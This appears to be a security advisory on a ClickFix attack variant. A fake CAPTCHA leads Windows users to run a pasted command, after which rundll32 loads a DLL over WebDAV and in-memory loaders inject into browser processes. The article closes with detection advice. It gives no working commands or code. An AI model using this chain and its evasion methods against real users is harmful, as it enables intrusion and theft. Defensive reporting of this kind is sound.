A newly discovered variant of the ClickFix attack technique is actively targeting Windows users by abusing built-in system components to evade detection. Instead of relying on PowerShell or mshta, the attack leverages rundll32.exe and WebDAV to quietly deliver malicious payloads. 
This change significantly reduces visibility for security tools focused on script-based threat detection.
Social Engineering Entry Point
The attack begins with a fake CAPTCHA verification page designed to trick users into executing commands manually.
Victims are instructed to:
- Press Win + R to open Run dialog
- Paste a pre-copied command
- Execute it using Enter
Because the instructions appear harmless, users unknowingly initiate the attack themselves.
Abuse of Native Windows Components
This variant avoids common scripting engines and instead uses trusted Windows utilities.
The malicious chain:
- Executes rundll32.exe
- Connects to remote WebDAV share
- Loads malicious DLL remotely
- Executes export function using ordinal values
Using ordinal-based exports adds an additional obfuscation layer.
WebDAV-Based Payload Delivery
WebDAV allows remote files to be accessed as network resources.
The attacker uses this capability to:
- Host malicious DLL externally
- Load payload directly into memory
- Avoid writing files to disk
- Reduce detection footprints
This approach enables stealthy initial access.
Multi-Stage In-Memory Execution
After initial execution, the attack transitions to a multi-stage chain.
Later stages:
- Invoke PowerShell quietly
- Use in-memory payload delivery
- Download additional components
- Avoid filesystem artifacts
This technique minimizes forensic evidence.
Secondary Payload Capabilities
The attack deploys a loader that:
- Resolves API calls dynamically
- Avoids static imports
- Uses hashing to obscure functions
- Performs sandbox detection
- Implements anti-debugging checks
These techniques complicate analysis and detection.
Process Injection for Persistence
Telemetry indicates code injection into legitimate applications.
Observed behaviors include:
- Memory injection into browser processes
- Hidden execution within trusted applications
- Persistence through process hijacking
- Reduced behavioral anomalies
This helps the malware remain concealed.
Detection Challenges
Because the attack uses legitimate tools, early detection is difficult.
Security teams may miss:
- rundll32 execution anomalies
- WebDAV traffic abuse
- In-memory payload delivery
- Minimal disk artifacts
Traditional script-based detection rules may not trigger.
Defensive Recommendations
Organizations should:
- Monitor rundll32 command-line usage
- Audit LOLBins activity
- Restrict unnecessary WebDAV traffic
- Block suspicious outbound connections
- Enable command-line logging
- Enhance user awareness training
These steps improve detection.
Conclusion
This ClickFix variant demonstrates a shift toward living-off-the-land techniques that rely on trusted Windows components. By combining social engineering, WebDAV payload delivery, and in-memory execution, attackers significantly reduce detection opportunities. Organizations should update monitoring strategies to include native tool abuse and user-driven execution scenarios.
